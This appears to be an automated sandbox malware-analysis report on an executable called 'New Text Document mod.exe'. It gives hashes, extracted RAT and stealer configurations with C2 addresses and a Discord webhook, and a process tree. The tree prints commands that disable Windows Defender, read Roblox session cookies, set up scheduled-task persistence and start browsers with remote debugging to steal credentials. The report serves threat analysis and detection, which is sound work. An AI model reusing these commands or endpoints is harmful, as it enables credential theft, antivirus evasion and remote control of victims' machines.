Overview

overview

10

Static

static

3

4363463463...63.exe

windows11-21h2-x64

10

New Text D...od.exe

windows11-21h2-x64

10

New Text D...od.exe

windows11-21h2-x64

Resubmissions

12-12-2024 18:20

241212-wy4dxsvkcp 10

12-12-2024 18:03

241212-wnfvwatqgp 10

28-11-2024 00:38

241128-ay5fbstmfp 10

Analysis

  • max time kernel
    116s
  • max time network
    129s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241023-en
  • resource tags

    arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-11-2024 00:38

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score
10/10
asyncratmercurialgrabberumbralxmrigdefaultcollectioncredential_accessdiscoveryevasionexecutionminerratspywarestealerupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe

Extracted

Family

asyncrat

Botnet

Default

C2

technical-southwest.gl.at.ply.gg:58694

forums-appliances.gl.at.ply.gg:1962
Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
aes.plain

Extracted

Family

mercurialgrabber

C2

https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

3.70.228.168:555

Mutex

bslxturcmlpmyqrv

Attributes
  • delay

    1

  • install

    true

  • install_file

    atat.exe

  • install_folder

    %AppData%

aes.plain
aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

3.70.228.168:555

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

66.66.146.74:9511

Mutex

nwJFeGdDXcL2

Attributes
  • delay

    3

  • install

    true

  • install_file

    System32.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Detect Umbral payload 2 IoCs
  • Mercurial Grabber Stealer

    Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

    stealermercurialgrabber
  • Mercurialgrabber family
    mercurialgrabber
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Async RAT payload 5 IoCs
    rat
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
    evasion
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • XMRig Miner payload 1 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 5 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 38 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 1 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
    evasion
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 10 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 52 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3312
      • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
        "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3740
        • C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
          "C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3356
        • C:\Users\Admin\AppData\Local\Temp\a\output.exe
          "C:\Users\Admin\AppData\Local\Temp\a\output.exe"
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Maps connected drives based on registry
          • Checks SCSI registry key(s)
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:3760
        • C:\Users\Admin\AppData\Local\Temp\a\saloader.exe
          "C:\Users\Admin\AppData\Local\Temp\a\saloader.exe"
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1724
          • C:\Windows\SYSTEM32\attrib.exe
            "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\saloader.exe"
            4⤵
            • Views/modifies file attributes
            PID:4248
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\saloader.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3008
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4796
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3016
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4636
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" os get Caption
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4904
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2312
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            4⤵
              PID:1580
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              4⤵
              • Command and Scripting Interpreter: PowerShell
              PID:1884
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:1712
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\a\saloader.exe" && pause
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              PID:1340
              • C:\Windows\system32\PING.EXE
                ping localhost
                5⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:716
          • C:\Users\Admin\AppData\Local\Temp\a\aidans.dont.run.exe
            "C:\Users\Admin\AppData\Local\Temp\a\aidans.dont.run.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2300
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"' & exit
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2348
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "windows" /tr '"C:\Users\Admin\AppData\Roaming\windows.exe"'
                5⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4932
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE4A3.tmp.bat""
              4⤵
                PID:3616
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  5⤵
                  • Delays execution with timeout.exe
                  PID:4860
                • C:\Users\Admin\AppData\Roaming\windows.exe
                  "C:\Users\Admin\AppData\Roaming\windows.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:4804
            • C:\Users\Admin\AppData\Local\Temp\a\handeltest.exe
              "C:\Users\Admin\AppData\Local\Temp\a\handeltest.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4000
            • C:\Users\Admin\AppData\Local\Temp\a\xs.exe
              "C:\Users\Admin\AppData\Local\Temp\a\xs.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4856
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"' & exit
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:236
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "aspnet_regbrowsers" /tr '"C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"'
                  5⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:4868
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE474.tmp.bat""
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2220
                • C:\Windows\system32\timeout.exe
                  timeout 3
                  5⤵
                  • Delays execution with timeout.exe
                  PID:2652
                • C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe
                  "C:\Users\Admin\AppData\Roaming\aspnet_regbrowsers.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:424
            • C:\Users\Admin\AppData\Local\Temp\a\Tutorial.exe
              "C:\Users\Admin\AppData\Local\Temp\a\Tutorial.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3712
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4236
            • C:\Users\Admin\AppData\Local\Temp\a\aa.exe
              "C:\Users\Admin\AppData\Local\Temp\a\aa.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1928
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"' & exit
                4⤵
                  PID:4372
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "atat" /tr '"C:\Users\Admin\AppData\Roaming\atat.exe"'
                    5⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1964
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE791.tmp.bat""
                  4⤵
                    PID:3140
                    • C:\Windows\system32\timeout.exe
                      timeout 3
                      5⤵
                      • Delays execution with timeout.exe
                      PID:4432
                    • C:\Users\Admin\AppData\Roaming\atat.exe
                      "C:\Users\Admin\AppData\Roaming\atat.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:2792
                • C:\Users\Admin\AppData\Local\Temp\a\nobody.exe
                  "C:\Users\Admin\AppData\Local\Temp\a\nobody.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:3992
                • C:\Users\Admin\AppData\Local\Temp\a\ataturk.exe
                  "C:\Users\Admin\AppData\Local\Temp\a\ataturk.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:2764
                • C:\Users\Admin\AppData\Local\Temp\a\start.exe
                  "C:\Users\Admin\AppData\Local\Temp\a\start.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2684
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"' & exit
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2228
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"'
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:3012
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF27E.tmp.bat""
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:4576
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 3
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Delays execution with timeout.exe
                      PID:3108
                    • C:\Users\Admin\AppData\Roaming\System32.exe
                      "C:\Users\Admin\AppData\Roaming\System32.exe"
                      5⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2688
                • C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe
                  "C:\Users\Admin\AppData\Local\Temp\a\Winsvc.exe"
                  3⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops startup file
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:4372
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                    4⤵
                      PID:2240
                  • C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
                    "C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
                    3⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Checks processor information in registry
                    PID:3092
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                      4⤵
                      • Uses browser remote debugging
                      • Drops file in Windows directory
                      • Enumerates system info in registry
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of FindShellTrayWindow
                      PID:4516
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc479cc40,0x7ffdc479cc4c,0x7ffdc479cc58
                        5⤵
                          PID:2296
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1852,i,18146950629213885738,9895686083821827235,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1848 /prefetch:2
                          5⤵
                            PID:1984
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2084,i,18146950629213885738,9895686083821827235,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2296 /prefetch:3
                            5⤵
                              PID:1696
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2124,i,18146950629213885738,9895686083821827235,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2332 /prefetch:8
                              5⤵
                                PID:1948
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3044,i,18146950629213885738,9895686083821827235,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3200 /prefetch:1
                                5⤵
                                • Uses browser remote debugging
                                PID:3096
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3008,i,18146950629213885738,9895686083821827235,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3240 /prefetch:1
                                5⤵
                                • Uses browser remote debugging
                                PID:2640
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4492,i,18146950629213885738,9895686083821827235,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4524 /prefetch:1
                                5⤵
                                • Uses browser remote debugging
                                PID:1248
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4612,i,18146950629213885738,9895686083821827235,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4532 /prefetch:8
                                5⤵
                                  PID:3672
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                4⤵
                                • Uses browser remote debugging
                                • Enumerates system info in registry
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of FindShellTrayWindow
                                PID:6292
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdc3f23cb8,0x7ffdc3f23cc8,0x7ffdc3f23cd8
                                  5⤵
                                    PID:2752
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,14019748627833963283,508227143579577558,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1984 /prefetch:2
                                    5⤵
                                      PID:7040
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1972,14019748627833963283,508227143579577558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 /prefetch:3
                                      5⤵
                                        PID:3428
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1972,14019748627833963283,508227143579577558,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2468 /prefetch:8
                                        5⤵
                                          PID:4784
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1972,14019748627833963283,508227143579577558,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
                                          5⤵
                                          • Uses browser remote debugging
                                          PID:7084
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1972,14019748627833963283,508227143579577558,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
                                          5⤵
                                          • Uses browser remote debugging
                                          PID:548
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,14019748627833963283,508227143579577558,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1976 /prefetch:2
                                          5⤵
                                            PID:5576
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,14019748627833963283,508227143579577558,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2788 /prefetch:2
                                            5⤵
                                              PID:6836
                                        • C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • System Location Discovery: System Language Discovery
                                          PID:2252
                                          • C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
                                            C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
                                            4⤵
                                            • Executes dropped EXE
                                            • Accesses Microsoft Outlook profiles
                                            • System Location Discovery: System Language Discovery
                                            • outlook_office_path
                                            • outlook_win_path
                                            PID:3872
                                          • C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
                                            C:\Users\Admin\AppData\Local\Temp\a\gvndxfghs.exe
                                            4⤵
                                            • Executes dropped EXE
                                            PID:2712
